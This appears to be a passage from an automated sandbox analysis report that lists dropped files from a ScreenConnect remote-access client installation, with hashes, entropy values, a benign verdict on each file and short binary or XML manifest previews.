                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):601376
                                                                                                                                                                                                                                                  Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                  MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                  SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                  SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                  SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):266
                                                                                                                                                                                                                                                  Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
